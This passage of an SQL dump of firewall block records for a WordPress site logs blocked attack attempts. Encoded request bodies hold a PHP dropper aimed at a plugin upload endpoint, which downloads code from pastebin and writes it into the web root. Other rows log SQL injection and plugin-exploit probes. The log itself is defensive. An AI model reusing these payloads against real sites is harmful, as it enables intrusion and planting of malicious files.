o=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8095,1564711814.294282,1564711813.187700,'\0\0\0\0\0\0\0\0\0\0{L',0,403,0,0,0,'https://companyregistration.online/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tMDc4MmQyZmU5YWNmYjU4YzkwZDRiMDRiOGM1MzAxZTcNCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"ImZpbGUiOyBmaWxlbmFtZT0iZmlsZXMvc2V0dGluZ3NfYXV0by5waHAiDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGENCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS0wNzgyZDJmZTlhY2ZiNThjOTBkNGIwNGI4YzUzMDFlNy0tDQo=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8081,1564682813.392230,1564682812.649500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8082,1564682811.597988,1564682810.915000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8083,1564682809.933897,1564682809.418300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8084,1564682808.238143,1564682807.333100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8085,1564682949.653630,1564682948.917900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8093,1564711654.704541,1564711654.310000,'\0\0\0\0\0\0\0\0\0\0{L',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Fwww.viamarkt.hu%2Freadme.txt&wpaa=echo+%22h1loo1%22%3B','http://www.google.com.hk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cDovL3d3dy52aWFtYXJrdC5odS9yZWFkbWUudHh0\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8086,1564682947.809870,1564682947.136100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8087,1564682946.011624,1564682945.246200,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8094,1564711792.005032,1564711791.462200,'\0\0\0\0\0\0\0\0\0\0{L',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=getcountryuser&cs=2',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tNzIyMTI5NjNjMGUyZThkMTU0MGNmY2RmZDBiYWE5MGENCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"InBvcGltZyI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCINCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS03MjIxMjk2M2MwZTJlOGQxNTQwY2ZjZGZkMGJhYTkwYS0tDQo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(8088,1564682944.159275,1564682943.476300,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8089,1564682942.243312,1564682941.502500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8090,1564682940.005478,1564682939.389500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8091,1564682938.396044,1564682937.548900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8092,1564682936.361951,1564682935.772000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8134,1564715899.893665,1564715899.444200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8135,1564715891.534615,1564715890.823400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8136,1564715879.992612,1564715879.522500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8137,1564715877.981560,1564715877.557600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8138,1564715876.358483,1564715875.951000,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL 